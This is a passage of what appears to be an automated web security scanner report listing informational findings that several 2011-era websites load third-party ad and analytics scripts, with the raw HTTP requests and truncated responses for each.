Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32119

<html><head><title>Plentyoffish.com Free Online Dating Service for singles</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
</script>
<script language="JavaScript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.874. http://www.ppcse.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ppcse.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://adn.ebay.com/cb?programId=1&campId=5336429377&toolId=10026&keyword=new&width=350&height=200&font=1&textColor=32527A&linkColor=333333&arrowColor=9A9AAF&color1=134FC7&color2=ffffff
http://adn.ebay.com/files/js/min/ebay_activeContent-min.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.ppcse.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 28 Sep 2009 03:43:18 GMT
ETag: "56393c1-1828-4749b192d6180"
Accept-Ranges: bytes
Content-Length: 6184
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD>

<TITLE>Pay Per Click Search Engine, internet marketing, online advertising, search engine, hit counter</TITLE>

<META NAME
...[SNIP]...
<br>
<script src='http://adn.ebay.com/files/js/min/ebay_activeContent-min.js'></script>
<script src='http://adn.ebay.com/cb?programId=1&campId=5336429377&toolId=10026&keyword=new&width=350&height=200&font=1&textColor=32527A&linkColor=333333&arrowColor=9A9AAF&color1=134FC7&color2=ffffff'></script>
...[SNIP]...
</center><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.875. http://www.proxyhelp.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.proxyhelp.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET / HTTP/1.1
Host: www.proxyhelp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/html
Content-Length: 71648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>The help you need to reach blocked
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

18.876. http://www.ratedesi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 06:48:24 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odm00hplmonq2l4mff2kcmq426; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="fb:admins" content="406321" />
<meta property="fb:page_id" content="3797
...[SNIP]...

<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4406.Orbitzcom/B5147944.5;abr=!ie;sz=160x160;ord=bqpabAu,bguqjptAjxpz?

Request

GET /html.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US HTTP/1.1
Host: www.revresda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:25:39 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Length: 711
Keep-Alive: timeout=5, max=27
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5;sz=160x160;ord=bqpabAu,bguqjptAjxpz?" WIDTH=160 HEIGHT=160 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4406.Orbitzcom/B5147944.5;abr=!ie;sz=160x160;ord=bqpabAu,bguqjptAjxpz?">
</SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4406.Orbitzcom/B5147944.11;abr=!ie;sz=728x90;ord=brzdwiI,bguqjptAjxpu?

Request

GET /html.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US HTTP/1.1
Host: www.revresda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NGUserID=aebaa22-3554-1360392959-4; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:25:39 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Length: 709
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11;sz=728x90;ord=brzdwiI,bguqjptAjxpu?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4406.Orbitzcom/B5147944.11;abr=!ie;sz=728x90;ord=brzdwiI,bguqjptAjxpu?">
</SCRIPT>
...[SNIP]...

18.879. http://www.robtex.com/as/as36621.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36621.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /as/as36621.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36621 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36621, VERISIGN-AS, VeriSign, Inc
Title: AS36621 VERISIGN-AS VeriSign, Inc
X-Content-Length: 109755
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p30147 f1052 d0 b
X-Last-Modified: Wed, 02 Feb 2011 00:06:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 00:06:44 GMT
ETag: 493d2110169cddbdd443be192561b186
Y-Content-Length: 109755 109755
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 109755
Date: Thu, 03 Feb 2011 03:34:08 GMT
X-Varnish: 191303787
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

18.880. http://www.robtex.com/dns/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/dns/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /dns/ HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: robtex swiss army knife internet tool
X-Meta-Keywords: rbls, as-numbers, whois, dns, lookup
Title: Domain Name Server records
X-Content-Length: 38860
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p4801 f1988 d0 b
Expires: Wed, 02 Feb 2011 20:31:43 GMT
Cache-Control: private
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 20:31:43 GMT
ETag: 158429b86d7094d148a2341e2a4ecbdd
Y-Content-Length: 38860 38860
Server: lighttpd/1.4.19
X-Cache: MISS from front0.x.robtex.com
X-Cache-Lookup: MISS from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 38860
Date: Wed, 02 Feb 2011 20:31:43 GMT
X-Varnish: 189043058
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

18.881. http://www.robtex.com/dns/google.com.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/dns/google.com.html

Issue detail

The response dynamically includes the following script from another domain:

http://scripts.chitika.net/eminimalls/amm.js

Request

GET /dns/google.com.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: Google.com is a domain controlled by four name servers at google.com themselves. All four of them are on different IP networks. The primary name server is ns1.google.com. Incoming mail for google.com...
X-Meta-Keywords: google.com, google, com
Title: google.com
X-Content-Length: 325933
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p21214 f430 d0 b
X-hdd: tz:(1296635534 1296636714 1296637258 1296638930) tz:(1) (1180)(544)(1672)
X-Last-Modified: Wed, 02 Feb 2011 08:32:00 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 08:32:00 GMT
ETag: eeb7c605a2e2b0975190125cad71a231
Y-Content-Length: 325933 326370
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 326370
Date: Wed, 02 Feb 2011 20:32:17 GMT
X-Varnish: 189046515
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...

18.882. http://www.robtex.com/dns/net.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/dns/net.html

Issue detail

The response dynamically includes the following script from another domain:

http://scripts.chitika.net/eminimalls/amm.js

Request

GET /dns/net.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: Net (the tld net) is a domain controlled by 13 name servers at gtld-servers.net. Having a total of 15 IP numbers. Two of them are on the same IP network. The primary name server is a.gtld-servers.net....
X-Meta-Keywords: net, net
Title: net
X-Content-Length: 119655
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p8756 f2650 d0 b
X-hdd: tz:(1296633796 1296637606 1296640899 1296641103) tz:(1) (3810)(3293)(204)
X-Last-Modified: Wed, 02 Feb 2011 09:28:40 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 09:28:40 GMT
ETag: e4edd157dbf9dcd8453345f6e424b440
Y-Content-Length: 119655 119658
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 119658
Date: Wed, 02 Feb 2011 20:32:04 GMT
X-Varnish: 189045204
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...

18.883. http://www.robtex.com/dns/ns1.google.com.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/dns/ns1.google.com.html

Issue detail

The response dynamically includes the following script from another domain:

http://scripts.chitika.net/eminimalls/amm.js

Request

GET /dns/ns1.google.com.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: ns1.google.com has one IP number (216.239.32.10), which also has a corresponding reverse pointer. 4shared-mp3.com, asiatravelmart.com, tianto.com, financialisms.com, basslakefest.com and at least 24...
X-Meta-Keywords: ns1.google.com, ns1, google, com
Title: ns1.google.com
X-Content-Length: 125820
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p14886 f2092 d0 b
X-hdd: tz:(1296661862 1296665650 1296671458 1296678465) tz:(0) (3788)(5808)(7007)
X-Last-Modified: Wed, 02 Feb 2011 20:20:42 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 20:20:42 GMT
ETag: 95c86ff893e1fe6a246f6628590610b3
Y-Content-Length: 125820 125820
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 125820
Date: Wed, 02 Feb 2011 20:32:39 GMT
X-Varnish: 189048759
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...

18.884. http://www.robtex.com/ext/ads/nb728.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/ext/ads/nb728.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /ext/ads/nb728.html HTTP/1.1
Host: www.robtex.com
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/dns/2mdn.net.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Wed, 02 Feb 2011 16:35:49 GMT
Content-Type: text/html
ETag: d552c6ae272df2614eb8083a0103c07a.gzip
Last-Modified: Wed, 2 Feb 2011 15:35:49 GMT
Vary: Accept-Encoding
X-E-Original-Length: 341
X-G-New-Length: 226
X-Rt: p7781 f4122
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Date: Wed, 02 Feb 2011 16:28:51 GMT
X-Varnish: 187636752 187331970
Age: 3108
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 341

<html><body><script type="text/javascript"><!--
google_ad_client = "pub-9079685345082025";
/* nb728 */
google_ad_slot = "6045830449";
google_ad_region= "test";
google_ad_width = 728;
google_ad_height
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.885. http://www.robtex.com/ext/ads/nt728.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/ext/ads/nt728.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /ext/ads/nt728.html HTTP/1.1
Host: www.robtex.com
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/dns/2mdn.net.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Wed, 02 Feb 2011 17:22:32 GMT
Content-Type: text/html
ETag: 7407e5df715b3610d0f728f872d09282.gzip
Last-Modified: Wed, 2 Feb 2011 16:22:32 GMT
Vary: Accept-Encoding
X-E-Original-Length: 341
X-G-New-Length: 225
X-Rt: p27302 f4946
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Date: Wed, 02 Feb 2011 16:28:51 GMT
X-Varnish: 187636750 187603796
Age: 329
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 341

<html><body><script type="text/javascript"><!--
google_ad_client = "pub-9079685345082025";
/* nt728 */
google_ad_slot = "6087885694";
google_ad_region= "test";
google_ad_width = 728;
google_ad_height
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.886. http://www.robtex.com/faq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/faq.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ctn.mywot.com/badge/robtex.com?orientation=horizontalsmall&file=js
http://www.link-gadget.com/j.js

Request

GET /faq.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: robtex swiss army knife internet tool
X-Meta-Keywords: rbls, as-numbers, whois, dns, lookup
Title: Frequently Asked Questions (FAQ)
X-Content-Length: 30262
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
